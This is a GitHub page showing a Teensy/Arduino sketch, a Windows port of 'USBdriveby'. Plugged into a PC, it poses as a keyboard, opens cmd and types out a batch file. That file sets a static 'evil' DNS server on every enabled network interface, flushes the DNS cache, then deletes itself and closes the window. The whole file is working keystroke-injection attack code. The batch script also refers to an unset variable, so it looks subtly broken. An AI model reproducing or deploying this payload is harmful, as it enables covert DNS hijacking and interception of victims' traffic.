forked from samyk/usbdriveby
-
Notifications
You must be signed in to change notification settings - Fork 0
/
usbdriveby_windows.ino
106 lines (89 loc) · 2.15 KB
/
usbdriveby_windows.ino
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
// USBdriveby Windows version by FFY00 (Filipe Laíns)
// Based on Samy Kamkar work
//
// https://github.com/samyk/usbdriveby
// Simulates a HID keyboard and runa bash file to change the dns server
// Tested on Windows 7
// Evil DNS Server
#define EVIL_SERVER "8.8.8.8"
const unsigned int ledPin = 13;
const unsigned int delayTime = 1500;
void setup()
{
delay(1000);
// Setup LED
pinMode(ledPin, OUTPUT);
digitalWrite(ledPin, HIGH);
waitForDrivers();
// Do the shit...
pwn();
}
// Open an application on Windows via Run
void openapp(String app)
{
// Windows Key + R to open Run
key(KEY_R , MODIFIERKEY_RIGHT_GUI);
delay(delayTime);
// Type the App you want to open
Keyboard.print(app);
key(KEY_ENTER, 0);
Keyboard.send_now();
delay(delayTime);
}
void key(int KEY, int MODIFIER)
{
Keyboard.set_modifier(MODIFIER);
Keyboard.set_key1(KEY);
Keyboard.send_now();
delay(20);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(20);
}
void waitForDrivers()
{
while (!(keyboard_leds & 2))
{
key(KEY_CAPS_LOCK, 0);
}
if (keyboard_leds & 2)
{
key(KEY_CAPS_LOCK, 0);
}
}
void pwn()
{
openapp("cmd");
Keyboard.println("cd AppData/Local/Temp");
Keyboard.println("echo.>pwn.bat");
Keyboard.println("notepad pwn.bat");
delay(delayTime);
Keyboard.println("@ECHO OFF");
Keyboard.print("set DNS=");
Keyboard.println(EVIL_SERVER);
Keyboard.println("for /f \"tokens=1,2,3*\" %%i in ('netsh int show interface') do (");
Keyboard.println(" if %%i equ Enabled (");
Keyboard.println(" netsh int ipv4 set dns name=\"%%l\" static %DNS1% primary validate=no");
Keyboard.println(" )");
Keyboard.println(")");
Keyboard.println("ipconfig /flushdns"); // Flush DNS is optional
key(KEY_F4, MODIFIERKEY_ALT);
delay(delayTime/5);
key(KEY_ENTER, 0);
delay(delayTime);
Keyboard.println("pwn.bat");
delay(delayTime);
Keyboard.println("del pwn.bat");
key(KEY_SPACE, MODIFIERKEY_ALT);
delay(delayTime/10);
key(KEY_C, 0);
}
void loop()
{
// Blink -> IT'S DONE
digitalWrite(ledPin, HIGH);
delay(80);
digitalWrite(ledPin, LOW);
delay(80);
}